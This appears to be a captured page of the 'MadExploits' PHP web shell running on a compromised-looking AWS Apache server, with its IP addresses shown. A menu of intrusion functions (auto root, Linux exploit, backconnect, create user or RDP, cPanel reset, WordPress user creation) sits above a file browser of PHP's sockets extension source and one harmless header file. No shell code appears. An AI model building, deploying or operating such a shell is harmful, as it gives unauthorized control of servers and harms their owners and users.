Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.227.111.48
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
sockets /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
76
B
-rw-r--r--
config.m4
3.11
KB
-rw-r--r--
config.w32
664
B
-rw-r--r--
conversions.c
43.29
KB
-rw-r--r--
conversions.h
2.51
KB
-rw-r--r--
multicast.c
20.47
KB
-rw-r--r--
multicast.h
3.53
KB
-rw-r--r--
php_sockets.h
3.72
KB
-rw-r--r--
sendrecvmsg.c
12.49
KB
-rw-r--r--
sendrecvmsg.h
1.04
KB
-rw-r--r--
sockaddr_conv.c
3.84
KB
-rw-r--r--
sockaddr_conv.h
904
B
-rw-r--r--
sockets.c
70.89
KB
-rw-r--r--
sockets.stub.php
3.93
KB
-rw-r--r--
sockets_arginfo.h
12.81
KB
-rw-r--r--
unix_socket_constants.h
14.19
KB
-rw-r--r--
win32_socket_constants.h
5.47
KB
-rw-r--r--
windows_common.h
3.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sockaddr_conv.h
#ifndef PHP_SOCKADR_CONV_H #define PHP_SOCKADR_CONV_H #include <php_network.h> #include "php_sockets.h" /* php_socket */ #ifndef PHP_WIN32 # include <netinet/in.h> #else # include <Winsock2.h> #endif /* * Convert an IPv6 literal or a hostname info a sockaddr_in6. * The IPv6 literal can be a IPv4 mapped address (like ::ffff:127.0.0.1). * If the hostname yields no IPv6 addresses, a mapped IPv4 address may be returned (AI_V4MAPPED) */ int php_set_inet6_addr(struct sockaddr_in6 *sin6, char *string, php_socket *php_sock); /* * Convert an IPv4 literal or a hostname into a sockaddr_in. */ int php_set_inet_addr(struct sockaddr_in *sin, char *string, php_socket *php_sock); /* * Calls either php_set_inet6_addr() or php_set_inet_addr(), depending on the type of the socket. */ int php_set_inet46_addr(php_sockaddr_storage *ss, socklen_t *ss_len, char *string, php_socket *php_sock); #endif
Close